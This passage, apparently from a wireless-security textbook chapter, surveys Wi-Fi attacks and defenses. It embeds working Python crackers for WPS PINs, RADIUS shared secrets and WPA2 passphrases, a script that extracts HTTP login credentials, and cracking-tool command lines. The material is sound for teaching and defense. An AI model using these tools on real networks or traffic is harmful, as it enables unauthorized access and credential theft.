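        if answer == "M7":
            return candidate, reg.attempts
        if answer == "NACK after M6":   # first half accepted
            first = candidate[:4]
            break
    if first is None:
        raise RuntimeError("first half not found; registrar is not behaving like WPS 1.0")
    for b in range(1_000):
        first7 = first + f"{b:03d}"
        candidate = first7 + str(wps_checksum(first7))
        if reg.try_pin(candidate) == "M7":
            return candidate, reg.attempts
    raise RuntimeError("second half not found")


WHOLE_PIN_KEYSPACE = 10 ** 7            # eight digits minus the derivable check digit
SPLIT_PIN_KEYSPACE = 10 ** 4 + 10 ** 3  # what the two-stage protocol leaves

if __name__ == "__main__":
    pin, used = brute_force(Registrar("12345670"))
    print(f"recovered {pin} after {used} attempts "
          f"(worst case {SPLIT_PIN_KEYSPACE} instead of {WHOLE_PIN_KEYSPACE})")
```

Two practical caveats the model leaves out: many access points lock WPS for a period after a handful of failed attempts (tools such as Reaver pause when they detect this), and some firmware seeds the PIN from the BSSID, which removes even the 11,000-guess work. Disabling WPS is the fix.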


Structure 


In this chapter, we will discuss the following topics: 


• Access control attacks

• Confidentiality attacks

• Credential attacks

• Authentication attacks


Objectives 


This chapter gives you a complete understanding of numerous wireless attack strategies, such as
access control attacks, confidentiality attacks, credential attacks, and authentication attacks.
The important thing to remember here is to be aware of the dangers we face when connecting to
wireless access points and the internet.


Access control attacks 


Access control attacks attempt to enter a network through its wireless side or to evade WLAN
access control measures such as AP MAC filters and 802.1X port access controls, as shown in
Figure 2.1. A MAC filter on its own is weak: an attacker can read an authorized client's MAC
address out of captured frames and set the same address on their own adapter.


Figure 2.1: WLAN access control 


The following sections demonstrate some access control attacks. 


War driving 


War driving is a reconnaissance technique whose name derives from war dialing, which the
movie WarGames, starring Matthew Broderick, made famous. In the movie, Broderick's
character dials every phone number in his local area to discover all the computers that answer.
Applied to Wi-Fi, that became the process of mapping access points, in which attackers find
vulnerable or unsecured Wi-Fi networks. The term war driving was coined by computer security
consultant Peter Shipley, who developed software that logged discovered networks together
with positions from a portable Global Positioning System (GPS) receiver. Simply put, war
driving is the process of locating wireless LANs by listening for beacons or issuing probe
requests, and it serves as a launchpad for subsequent attacks. It can be carried out with tools
such as airodump-ng, Kismet, DStumbler, KisMAC, and NetStumbler. War driving normally
involves two people: one driving the car and the other scanning the surroundings for wireless
networks. With the right software, they record GPS coordinates for the Wi-Fi spots they find
and keep them for future wireless attacks, as shown in Figure 2.2:


Figure 2.2: War driving diagram 
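As an added example (not code from the book), the following Python code shows the core of what a war-driving tool does with the beacons it hears: it parses the 802.11 management frame, pulls the BSSID, SSID, channel and privacy (encryption) bit out of it, and flags cloaked networks that beacon with an empty SSID. The beacon frames and MAC addresses are constructed for illustration; a real tool reads frames from a monitor-mode interface (with a radiotap header in front, omitted here) and adds GPS coordinates.

```python
import struct

# Added example (not from the book): what a war-driving tool does with the
# beacons it hears in monitor mode. The frames below are constructed, not a
# real capture; the radiotap/PRISM header a real driver prepends is omitted.

BROADCAST = b"\xff" * 6


def mac_bytes(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_beacon(bssid: str, ssid: bytes, channel: int, privacy: bool = True) -> bytes:
    """Minimal 802.11 beacon: MAC header, fixed fields, then information elements."""
    fc = 0x0080                                    # type 0 (management), subtype 8 (beacon)
    hdr = struct.pack("<HH6s6s6sH", fc, 0, BROADCAST, mac_bytes(bssid), mac_bytes(bssid), 0)
    capability = 0x0001 | (0x0010 if privacy else 0)   # ESS bit; Privacy bit = encryption on
    fixed = struct.pack("<QHH", 0, 100, capability)    # timestamp, interval (100 TU), capability
    ies = bytes([0, len(ssid)]) + ssid                 # SSID element (tag 0); empty = "hidden"
    ies += bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])       # supported rates 1/2/5.5/11 Mbps (basic)
    ies += bytes([3, 1, channel])                      # DS parameter set (tag 3) carries the channel
    return hdr + fixed + ies


def parse_beacon(frame: bytes):
    """Return BSSID/SSID/channel/encryption from a beacon, or None for other frames."""
    if len(frame) < 36:
        return None
    fc, _dur, _a1, _a2, a3, _seq = struct.unpack_from("<HH6s6s6sH", frame, 0)
    if fc & 0x00FC != 0x0080:                          # not a beacon (mask type+subtype bits)
        return None
    _ts, interval, capability = struct.unpack_from("<QHH", frame, 24)
    info = {"bssid": mac_str(a3), "ssid": None, "hidden": False,
            "channel": None, "privacy": bool(capability & 0x0010), "interval_tu": interval}
    off = 36
    while off + 2 <= len(frame):                       # walk the tag/length/value elements
        tag, ln = frame[off], frame[off + 1]
        val = frame[off + 2: off + 2 + ln]
        if len(val) < ln:
            break                                      # truncated element; stop parsing
        if tag == 0:
            info["hidden"] = not val.strip(b"\x00")    # empty or all-NUL SSID = cloaked network
            info["ssid"] = "" if info["hidden"] else val.decode("utf-8", "replace")
        elif tag == 3 and ln == 1:
            info["channel"] = val[0]
        off += 2 + ln
    return info


def war_drive(frames):
    """Collect one entry per BSSID, the way airodump-ng/Kismet build their network list."""
    seen = {}
    for f in frames:
        info = parse_beacon(f)
        if info:
            seen.setdefault(info["bssid"], info)
    return seen


if __name__ == "__main__":
    capture = [build_beacon("00:11:22:33:44:55", b"CoffeeShop", 6),
               build_beacon("66:77:88:99:aa:bb", b"", 11, privacy=False)]   # constructed
    for bssid, n in war_drive(capture).items():
        print(bssid, n["ssid"] or "<hidden>", "ch", n["channel"], "enc" if n["privacy"] else "open")
```

The privacy bit only says that encryption is on; telling WEP from WPA/WPA2 needs the RSN (tag 48) or vendor WPA element, which real tools parse the same way by walking the element list.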


Rogue access points 


Any wireless access point (AP) that is placed on a network without authorization, and hence is 
not maintained by the network administrator, is known as a rogue access point. Rogue access 
points are not protected in the same way that managed access points are. They are particularly 
dangerous because they sit inside the network perimeter, behind the firewall, so anyone who can 
associate with the AP gets access to the internal network. Rogue APs can be plugged directly 
into a firewall or network switch, a wall jack, or even other network devices, and can be 
installed maliciously by an attacker or simply by an employee looking for their own Wi-Fi 
access. Either way, rogue access points can be used for several assaults, including denial of 
service, data theft, and malware deployment, as shown in Figure 2.3: 


Figure 2.3: Rogue access point 


Ad hoc associations 


Ad hoc association attacks are a particularly nasty sort of attack in which the attacker (a 
malicious user) uses a legitimate third-party user's machine as a man-in-the-middle between the 
attacker's device and the AP or other type of gateway. 


The Ad hoc wireless network capability, which is essential for device-in-the-middle operations, 
may be deployed on both Windows and Linux computers and enables the establishment of ad- 
hoc (peer-to-peer) wireless links between client devices (without any additional network 
infrastructure such as AP). What you do behind the scenes is to build a virtual software AP on 
your PC, and the second device associates with the SSID you created (effectively making 
wireless links). 


An Ad hoc attack would be described in the following scenario, as shown in Figure 2.4. Let us 
pretend the attacker is one of Computers 2, 3, or 4. Computer 1 would be the victim (man-in-the- 
middle). This laptop will be the one that is running and providing wireless connectivity to the 
surrounding area and has another interface connected to the wired network for internet access. 


Attackers might connect to Computer 1’s WLAN and then use it to route all traffic to the internet 
through this victim’s PC. From the perspective of the internet, Computer 1 appears to be the 
source of the traffic! Wireless linkages from Computer 1 to all attackers do not have to be Wi-Fi 
connections; they could be Bluetooth or any other sort of wireless technology that is supported 
by all parties involved in the communication attempt. 


Refer to Figure 2.4: 
Figure 2.4: Ad hoc associations 


MAC spoofing 


In a MAC spoofing attack, the intruder sniffs the network for the MAC addresses of authorized 
clients and then changes the MAC address of their own adapter to one of them, inheriting that 
client's access through the wireless access point. It works because the MAC addresses in every 
802.11 frame header are sent in the clear even when the payload is encrypted, so AP MAC filters 
and MAC-based authorization are trivial to bypass. This type of assault is popular at paid 
hotspots such as hotels, airports, coffee shops, and other paid Internet venues, where the 
captive portal authorizes a client by its MAC address once it has paid. The MAC spoofing attack 
is depicted in Figure 2.5: 
Figure 2.5: MAC spoofing 


802.11 RADIUS cracking 


Although we do not hear much about this attack, it is an essential topic to discuss. In this 
assault, the attacker recovers the Remote Authentication Dial-In User Service (RADIUS) 
shared secret between the AP and the RADIUS server by brute force, using captured 802.1X access 
requests and the server's responses. Any packet capture tool on the wired LAN between the AP 
and the RADIUS server will do; the Response Authenticator of each reply is an MD5 hash that 
includes the secret, so candidate secrets can be tested offline. This is quite risky because 
many APs, servers, and even software services authenticate against the same RADIUS server. If 
the secret is compromised, the attacker can decrypt password attributes, forge Access-Accept 
responses, and gain access to anything that relies on RADIUS to approve access. This assault is 
depicted in Figure 2.6: 
Figure 2.6: 802.11 RADIUS cracking 
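The offline part of this attack is small enough to show in full. The following Python example (added here; not code from the book) builds an RFC 2865 Access-Request and Access-Accept with a constructed shared secret and request authenticator, then recovers the secret by testing a wordlist against the Response Authenticator and uses it to decrypt the User-Password attribute. The packets, secret, wordlist and user name are assumptions for illustration.

```python
import hashlib
import struct

# Added example (not from the book): the offline half of 802.11 RADIUS cracking.
# The packets follow RFC 2865: an Access-Request carrying User-Name and
# User-Password, and the Access-Accept that answers it. Everything here is
# constructed; in the attack the two packets come from a capture taken on the
# wired LAN between the AP (the NAS) and the RADIUS server.

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD, REPLY_MESSAGE = 1, 2, 18


def encode_attrs(attrs) -> bytes:
    """Attributes are type/length/value triples; the length counts the 2-byte header."""
    return b"".join(bytes([t, 2 + len(v)]) + v for t, v in attrs)


def encrypt_user_password(secret: bytes, req_auth: bytes, password: bytes) -> bytes:
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each block with MD5(secret + previous block)."""
    pad = 16 if not password else (-len(password)) % 16
    padded = password + b"\x00" * pad
    out, prev = b"", req_auth              # first block is chained to the Request Authenticator
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], keystream))
        out += block
        prev = block
    return out


def decrypt_user_password(secret: bytes, req_auth: bytes, enc: bytes) -> bytes:
    """Inverse of the above; the chaining value is the previous ciphertext block."""
    out, prev = b"", req_auth
    for i in range(0, len(enc), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(enc[i:i + 16], keystream))
        prev = enc[i:i + 16]
    return out.rstrip(b"\x00")


def build_request(ident: int, req_auth: bytes, attrs) -> bytes:
    body = encode_attrs(attrs)
    return struct.pack("!BBH16s", ACCESS_REQUEST, ident, 20 + len(body), req_auth) + body


def build_response(code: int, ident: int, req_auth: bytes, attrs, secret: bytes) -> bytes:
    """Response Authenticator = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    body = encode_attrs(attrs)
    head = struct.pack("!BBH", code, ident, 20 + len(body))
    return head + hashlib.md5(head + req_auth + body + secret).digest() + body


def crack_shared_secret(request: bytes, response: bytes, wordlist):
    """Offline dictionary attack: recompute the Response Authenticator for each candidate."""
    req_auth = request[4:20]
    length = struct.unpack("!H", response[2:4])[0]
    head, resp_auth, body = response[:4], response[4:20], response[20:length]
    for cand in wordlist:
        if hashlib.md5(head + req_auth + body + cand).digest() == resp_auth:
            return cand
    return None


def recover_user_password(request: bytes, secret: bytes):
    """With the secret known, decrypt the User-Password attribute of a PAP Access-Request."""
    req_auth, off = request[4:20], 20
    while off + 2 <= len(request):
        t, ln = request[off], request[off + 1]
        if ln < 2:
            break                                   # malformed attribute
        if t == USER_PASSWORD:
            return decrypt_user_password(secret, req_auth, request[off + 2:off + ln])
        off += ln
    return None


# Constructed sample "capture"
SECRET = b"testing123"        # assumed secret (the FreeRADIUS sample-config value, often left unchanged)
REQ_AUTH = bytes(range(16))   # assumed; a real NAS uses 16 random bytes
SAMPLE_REQUEST = build_request(42, REQ_AUTH, [
    (USER_NAME, b"alice"),
    (USER_PASSWORD, encrypt_user_password(SECRET, REQ_AUTH, b"Winter-2020!")),
])
SAMPLE_RESPONSE = build_response(ACCESS_ACCEPT, 42, REQ_AUTH, [(REPLY_MESSAGE, b"Welcome")], SECRET)
WORDLIST = [b"password", b"radius", b"secret", b"testing123", b"changeme"]

if __name__ == "__main__":
    secret = crack_shared_secret(SAMPLE_REQUEST, SAMPLE_RESPONSE, WORDLIST)
    print("shared secret:", secret, "| user password:", recover_user_password(SAMPLE_REQUEST, secret))
```

With 802.1X/EAP the user's password is not carried in a User-Password attribute, but the same secret protects the MS-MPPE-Recv-Key attribute that delivers the session key (PMK) to the AP, and it is all an attacker needs to forge an Access-Accept; a long random secret per NAS, or RADIUS over TLS, is the fix.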


Confidential attacks 


These attacks try to intercept private data transferred over wireless networks, whether it is sent in 
clear text or encrypted using 802.11 or higher-layer protocols. 


The following sections discuss various confidentiality attacks. 


Eavesdropping 


Of course, we all understand what eavesdropping is, but do you understand what it implies in 
terms of security? When it comes to computer security, eavesdropping means capturing data, 
decoding it, and then obtaining potentially sensitive information. It is the same as listening in 
on a phone call: you listen to the conversation, record it, and then extract potentially sensitive 
information from it. Ettercap, Kismet, and Wireshark are all capable of this. The attack is 
depicted in Figure 2.7: 
Figure 2.7: Eavesdropping 


WEP key cracking 


It is finally time to talk about WEP cracking! It is exactly what it sounds like: using passive or 
active methods to capture enough encrypted traffic to recover the WEP key. Because of 
weaknesses in how WEP uses RC4 initialization vectors, a WEP key can be recovered in less than 
5 minutes with today's hardware and software, and packet injection can generate the needed 
traffic even on a quiet network. WEP should be used only where old gear leaves no choice, and 
that gear should be isolated; otherwise, WPA2 (or WPA3) should be used. These attacks can be 
carried out using tools such as Aircrack-ng, AirSnort, Airoway, chopchop, and dwepcrack. An 
example of WEP key cracking is seen in Figure 2.8: 


Figure 2.8: WEP Key cracking 


Evil twin AP 


Have you ever heard of an AP with an evil twin? An evil twin AP is a kind of rogue access point. 
To trick users into thinking it is a trusted wireless network, the attacker sets up a fake AP that 
broadcasts the same SSID as the legitimate one. The attacker then boosts the signal or places the 
evil twin closer to the victims, so the client, which prefers the strongest access point advertising 
a network it knows, connects to it instead, often automatically. The most common evil twin 
scenario you will meet in the wild targets open networks with captive portals, such as those at 
Starbucks, airports, and hotels. These attacks can be carried out via Honeypot, CqureAP, D-Link 
G200, HermesAP, Rogue Squadron, and WifiBSD. The following image depicts a common tool, as 
shown in Figure 2.9: 
Figure 2.9: Evil twin AP 


AP phishing 


To phish for logins, bank accounts, and credit card details, the attacker operates a phony Web 
portal or Web server on a fake AP. Because ordinary users will not see the attack happening to 
them, this is by far one of the most hazardous and frightening attacks to encounter. They will 
think it is the actual website, but the attacker is merely waiting for them to log in so they can 
steal the data on the other side. These attacks can be carried out with tools such as Airpwn, 
Airsnarf, Hotspotter, Karma, and RGlueAP, as shown in Figure 2.10: 
Figure 2.10: AP phishing 


Man-in-the-middle attack 


You might have heard of this attack tactic before; if you have not, you will now! In a 
man-in-the-middle attack, an attacker intercepts network traffic between you and another party 
and relays it, so that both sides believe they are talking directly to each other. On a wired or 
wireless network, the attacker might capture usernames and passwords, read e-mails, view HTTP 
sessions of websites, and much more. These attacks can be carried out with tools such as dsniff, 
Ettercap-NG, and sshmitm. This attack is depicted in Figure 2.11: 
Figure 2.11: MITM attack 


Credential attacks 


Have you ever heard of or dealt with a person whose online accounts were hacked? Most likely, 
this user has been a victim of a credential attack in which an attacker has stolen their login 
credentials. This can be accomplished with the use of a Web server or tools such as the Social 
Engineering Toolkit (SET). The attacker can clone a website and make it appear genuine and 
reputable to fool the user into signing in. They have no idea that someone suddenly has complete 
access to their data. The credential harvester and phishing attack methods will be discussed in the 
following sections. 


Credential harvester 


This technique launches an Apache server on the attacker's PC that serves a clone of a website 
so that it appears authentic. The attacker connects to the wireless access point and uses DNS 
spoofing to redirect the victim's HTTP requests for the real site to the bogus one. The website 
will look the same as the real website when the user tries to log in normally, while on the 
attacker's end, the attacker obtains the user's username and password, as well as the user's IP 
address. From here, the attacker can keep collecting account logins, which they can subsequently 
save in a report. It is worthwhile to run authorized social engineering assessments against your 
company's employees to see whether they follow processes and security standards. This can be 
seen in Figure 2.12: 
Figure 2.12: Credential harvester 


Phishing 

So, what exactly is phishing, and how do we spot a phishing attempt, a fraud, or a hoax? 
Phishing is a deceptive method of obtaining personal information such as usernames, passwords, 
social security numbers, phone numbers, and credit card numbers. These attacks typically start 
with an e-mail instructing the user to visit a website to update information, change a password, 
or verify an account. The easiest way to avoid becoming a victim of a phishing scam is to 
understand how they work. An e-mail from an unknown source requesting your password or 
asking you to change your password is most likely fraudulent. Such e-mails should be blocked or 
marked as spam or phishing. If you suspect you have been a victim of phishing, change your 
passwords, as shown in Figure 2.13: 
Figure 2.13: Phishing 


Authentication attacks 


Authentication attacks are used by attackers to steal valid user identities and credentials to gain 
access to private networks and services. The following sections describe some authentication 
attacks. 


Shared key guessing 


The attacker tries to guess the key used for 802.11 shared key authentication (the WEP 
authentication mode), starting from vendor default keys or the output of the key generators that 
vendors ship. Shared keys should never be left at their defaults and should be changed as soon 
as the device is set up and configured. This attack can be carried out using any cracking tool, 
such as Aircrack-ng, as shown in Figure 2.14: 
Figure 2.14: Shared key guessing 


PSK cracking 


Using a dictionary attack tool, the PSK cracking technique recovers a WPA/WPA2 pre-shared key 
from captured 4-way handshake frames. The strength of the passphrase is what decides this 
attack: the key is derived from the passphrase and the SSID with 4096 rounds of PBKDF2, which 
is slow enough that a long random passphrase could take weeks or years to crack, which may not 
be worth a hacker's time, while a dictionary word falls in minutes. Because the derivation depends 
only on the passphrase and the SSID, an attacker can precompute tables for common SSIDs, 
which is what genpmk does. When making your own passphrases, use a combination of letters, 
numbers, and symbols; the more characters you have, the more candidates an attacker must try. 
These attacks can be carried out with tools such as coWPAtty, genpmk, KisMAC, and wpa_crack. 
A PSK cracking attack is depicted in Figure 2.15: 


root@kali:~# cowpatty -h 
cowpatty 4.8 - WPA-PSK dictionary attack. <jwright@hasborg.com> 

Usage: cowpatty [options] 
    Packet capture file 

Figure 2.15: PSK cracking 
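To show what coWPAtty and aircrack-ng actually compute, the following Python example (added here; not code from the book) derives the PMK and PTK for each candidate passphrase and compares the resulting MIC against the one in message 2 of the 4-way handshake. The SSID, MAC addresses, nonces, RSN IE, passphrase and wordlist are constructed for the lab; a real tool reads them from message 1 (ANonce) and message 2 (SNonce, RSN IE, MIC) in a pcap.

```python
import hashlib
import hmac

# Added example (not from the book): what coWPAtty/aircrack-ng do with a
# captured 4-way handshake. All handshake values below are constructed for a
# lab SSID; a real tool reads ANonce from message 1 and SNonce, the RSN IE
# and the MIC from message 2 of the EAPOL-Key exchange in a pcap.

MIC_OFFSET = 81       # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 over the two MACs and two nonces; the KCK is the first 16 bytes of the PTK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2/AES (key descriptor version 2): MIC = HMAC-SHA1-128 over the frame with the MIC zeroed."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, rsn_ie: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Message 2 of the 4-way handshake as the supplicant sends it (RSN key descriptor)."""
    body = (b"\x02"                       # key descriptor type: RSN
            + b"\x01\x0a"                 # key info: version 2 (HMAC-SHA1/AES), pairwise, MIC set
            + b"\x00\x00"                 # key length
            + (1).to_bytes(8, "big")      # replay counter
            + snonce + b"\x00" * 16       # key nonce, key IV
            + b"\x00" * 8 + b"\x00" * 8   # key RSC, key ID
            + mic
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type EAPOL-Key


def crack_psk(ssid, aa, spa, anonce, snonce, eapol2, wordlist):
    """Dictionary attack: the candidate whose derived KCK reproduces the captured MIC wins."""
    captured_mic = eapol2[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol2), captured_mic):
            return cand
    return None


# Constructed "capture" for the lab network
SSID = b"CoffeeShop"
AA = bytes.fromhex("001122334455")       # AP (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")      # client (supplicant) MAC
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK, CCMP
_TRUE_KCK = ptk_from_pmk(pmk_from_passphrase("sunshine2020", SSID), AA, SPA, ANONCE, SNONCE)[:16]
EAPOL2 = build_eapol_msg2(SNONCE, RSN_IE, eapol_mic(_TRUE_KCK, build_eapol_msg2(SNONCE, RSN_IE)))
WORDLIST = ["password", "coffeeshop", "letmein", "sunshine2020", "qwerty123"]

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, EAPOL2, WORDLIST))
```

The expensive step is pmk_from_passphrase; everything after it is a few HMACs. That is why genpmk precomputes PMKs per SSID and why a GPU cracker measures its speed in PBKDF2 evaluations per second, and it is also why an uncommon SSID plus a long passphrase defeats precomputed tables. For WPA with TKIP (key descriptor version 1) the MIC is HMAC-MD5 instead.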


Sniffing application credentials 


When sniffing for application credentials, the attacker collects user credentials such as e-mail 
addresses and passwords from clear text application protocols. This rarely works on major 
websites anymore since most use HTTPS; nonetheless, when logging in to wireless routers or 
access points, HTTP is still commonly used, which is unencrypted clear text. If you use the HTTP 
protocol to sign in, the attacker has easy access to your username and password. These attacks 
can be carried out with tools such as Ace Password Sniffer, dsniff, PHoss, and Win Sniffer, as 
shown in Figure 2.16: 
Figure 2.16: Sniffing 


Cracking domain accounts 


When cracking domain accounts, the attacker uses a brute-force or dictionary attack tool to 
recover a user's credentials, such as their Windows login and password, from captured password 
hashes (for example, LM/NTLM hashes taken from NetBIOS/SMB authentication or dumped from a 
compromised machine). Some tools also recover browser-saved passwords from Internet Explorer, 
Firefox, or Google Chrome. If an attacker obtains your credentials, they may be able to access 
network shares, send and receive e-mails, and potentially compromise the entire domain if the 
account has administrative privileges. These attacks can be carried out with tools such as John 
the Ripper, L0phtCrack, and Cain, as shown in Figure 2.17: 


root@kali:~# john --format=raw-MD5 /root/Desktop/MD5hash.txt 
Using default input encoding: UTF-8 
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) 
Warning: no OpenMP support for this hash type, consider --fork=2 
Proceeding with single, rules:Single 
Press 'q' or Ctrl-C to abort, almost any other key for status 
Almost done: Processing the remaining buffered candidate passwords, if any. 
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist 
Proceeding with incremental:ASCII 
1g 0:00:00:09 DONE 3/3 (2020-05-03 19:37) 0.1057g/s 579306p/s 579306c/s 579306C/s passe608..pasho13 
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably 
Session completed 


Figure 2.17: John the Ripper 


VPN login cracking 


The attacker uses a brute-force attack on VPN authentication protocols to obtain user 
credentials such as PPTP or IPsec passwords. IKEv1 in aggressive mode, for instance, sends a 
hash derived from the pre-shared key in the clear, which can be captured with ike-scan and 
cracked offline. Make sure the password and the pre-shared secret key are both unique and 
extremely strong. Passwords or numbers that are easy to guess can compromise a whole 
organization, resulting in customer information being disclosed. These attacks can be carried out 
using tools such as IKE-scan, IKECrack, anger, and THC-pptp-bruter. The VPN login cracking 
attack is shown in Figure 2.18: 


# ike-scan 192.168.59.101 -M -A id=groupnamedoesnotexit 


Figure 2.18: IKE-scan 


802.11 identity theft 


In an 802.11 identity theft attack, the attacker collects user profiles and login details from 
clear text traffic over wireless 802.11. Encryption is essential for ensuring that no data is 
compromised. While connected to a Wi-Fi network, using HTTPS and a VPN will help protect you 
from assaults such as this. This can be done with capture tools such as Wireshark or 
Ettercap-NG, as shown in Figure 2.19: 


[Figure 2.19 shows a Wireshark capture: frame 8 (161 bytes), 192.168.3.6 to 208.80.152.201, 
HTTP POST /w/index.php?title=..., with the 107-byte form body (wpName=...&wpPassword=... 
&wpLoginToken=...) readable in the packet bytes pane.] 


Figure 2.19: Stealing password using Wireshark 
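The following Python example is added here (it is not code from the book) to show the parsing step behind tools such as dsniff, both for the clear-text form POST of Figure 2.19 above and for the HTTP Basic login that many routers still use, as described under sniffing application credentials earlier: it takes the TCP payload of one HTTP request and pulls out the fields that carry credentials. The two requests, host names and credentials are constructed, not captured.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# Added example (not from the book): the parsing step of a dsniff-style
# credential sniffer. Input is the reassembled TCP payload of one HTTP
# request; both requests below are constructed, modelled on the clear-text
# login POST in Figure 2.19 and on a router's HTTP Basic login.

CREDENTIAL_FIELDS = {"user", "username", "login", "email", "wpname",
                     "pass", "password", "passwd", "pwd", "wppassword"}


def parse_http_request(payload: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, sep, body = payload.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: no end of headers")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def extract_credentials(payload: bytes):
    """Return a dict of harvested fields, or None when the request carries no credentials."""
    method, target, headers, body = parse_http_request(payload)
    found = {}
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):                # RFC 7617: base64("user:password")
        user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
        found["basic_user"], found["basic_password"] = user, password
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        length = int(headers.get("content-length", len(body)))
        for field, values in parse_qs(body[:length].decode("latin-1")).items():
            if field.lower() in CREDENTIAL_FIELDS:       # keep only fields that look like credentials
                found[field] = values[0]
    if not found:
        return None
    return {"host": headers.get("host", ""), "path": urlsplit(target).path, **found}


# Constructed sample traffic (not a real capture)
_BODY = b"wpName=alice&wpPassword=Winter-2020%21&wpLoginToken=deadbeef"
LOGIN_POST = (b"POST /w/index.php?title=Special:UserLogin&action=submitlogin HTTP/1.1\r\n"
              b"Host: wiki.example.org\r\nContent-Type: application/x-www-form-urlencoded\r\n"
              + b"Content-Length: %d\r\n\r\n" % len(_BODY) + _BODY)
ROUTER_GET = (b"GET /index.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n"
              b"Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n")

if __name__ == "__main__":
    for pkt in (LOGIN_POST, ROUTER_GET):
        print(extract_credentials(pkt))
```

A real sniffer has to reassemble the TCP stream first, since a POST body often arrives in a later segment than its headers; the parsing above is what runs once a complete request is in hand, and it is why a login form served over plain HTTP, or a router's Basic-auth page, is only as private as the air it crosses.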


802.11 password guessing 


An 802.11 password-guessing attack uses a captured identity (a username seen in the clear, for 
example in an EAP identity response) to repeatedly guess that user's password against the 
802.11 authentication. The attacker is likely to keep trying default passwords, vendor names, the 
most common passwords, birthdays, names, phone numbers, and other personal information until 
they gain access to the wireless network. If the attacker has a large password dictionary, a 
dictionary attack can be readily carried out, and access gained in a few hours. These attacks can 
be carried out with tools such as John the Ripper and THC Hydra, as shown in Figure 2.20: 


Figure 2.20: THC Hydra 


802.11 LEAP cracking 


In an 802.11 LEAP cracking attack, the attacker recovers user credentials from recorded 802.11 
LEAP packets. LEAP uses an MS-CHAP style challenge/response built on the user's NT password 
hash, so a dictionary attack tool can test candidate passwords offline against the captured 
challenge and response. Success depends on the strength of the password; if it is strong, it is 
unlikely to be cracked, which is why it is critical to use a combination of letters, numbers, and 
symbols to resist dictionary attacks, and why LEAP itself should be replaced by PEAP or 
EAP-TLS. These attacks can be carried out with tools such as Anwrap, Asleap, and 
THC-LEAPcracker. Figure 2.21 serves as an example: 
Figure 2.21: Asleap 


802.11 EAP downgrade attack 


802.1X uses EAP to carry the authentication exchange between the connecting client (the 
supplicant) and the authentication server, with the AP relaying it. If an attacker can place 
themselves between the client and the authentication server, they can tamper with that exchange 
while the user connects. Using forged EAP-Response/NAK packets, which a client normally sends 
to decline an EAP method it does not support, the attacker forces the wireless 802.11 device or 
server to fall back to a weaker type of authentication. Because that weaker method is so poor, 
the attacker can then recover credentials and gain access in a matter of minutes. These attacks 
can be carried out using tools such as File2air and libradiate. Figure 2.22 serves as an 
example: 


root@kali:~# ./file2air -h 
file2air v0.1 - inject 802.11 packets from binary files <Joshua.Wright@jwu.edu> 
Usage: file2air [options] 
    -i --interface   Interface to inject with 
    -c --channel     Specify a channel (defaults to current) 
    -m --mode        Specify an operating mode (defaults to current) 
    -r --monitor     Specify RFMON mode (1=on, 0=off, defaults to current) 
    -f --filename    Specify a binary file contents for injection 
    -n --count       Number of packets to send 
    -w --delay       Delay between packets (uX for usec or X for seconds) 
    -d --dest        Override the destination address 
    -s --source      Override the source address 
    -b --bssid       Override the BSSID address 
    -h --help        Output this help information and exit 
    -v --verbose     Print verbose info (more -v's for more verbosity) 


Figure 2.22: File2air 


Conclusion 


Several potential attack methods that can be employed over wireless were explored: access 
control attacks, confidential attacks, credential attacks, and authentication attacks. We built a 
complete understanding of the risks a user faces. 


We will go through how to scan wireless networks for information in the upcoming chapter, as 
well as different wireless scanning methods and how they can be used for both good and bad. 


Questions 


Mention the most famous access control attacks. 
